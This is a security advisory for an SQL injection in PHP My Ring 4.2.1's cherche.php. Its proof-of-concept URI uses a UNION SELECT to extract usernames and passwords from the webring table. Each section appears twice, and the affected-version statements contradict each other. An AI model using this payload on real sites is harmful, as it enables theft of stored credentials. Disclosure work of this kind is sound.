PHP My Ring Cherche.PHP SQL Injection Vulnerability
BID:20792
Info
PHP My Ring Cherche.PHP SQL Injection Vulnerability
| Bugtraq ID: | 20792 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 30 2006 12:00AM |
| Updated: | Oct 31 2006 04:42AM |
| Credit: | ajann is credited with the discovery of this vulnerability. |
| Vulnerable: |
PHP My Ring PHP My Ring 4.2.1 |
| Not Vulnerable: | |
Discussion
PHP My Ring Cherche.PHP SQL Injection Vulnerability
PHP My Ring is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Versions prior to 4.2.1 are vulnerable to this issue.
PHP My Ring is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Versions prior to 4.2.1 are vulnerable to this issue.
Exploit / POC
PHP My Ring Cherche.PHP SQL Injection Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/cherche.php?limite=-1%20union%20select%200,pseudo,0,mdp,0,0%20from%20webring/*&mots=%20&where=description
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/cherche.php?limite=-1%20union%20select%200,pseudo,0,mdp,0,0%20from%20webring/*&mots=%20&where=description
Solution / Fix
PHP My Ring Cherche.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].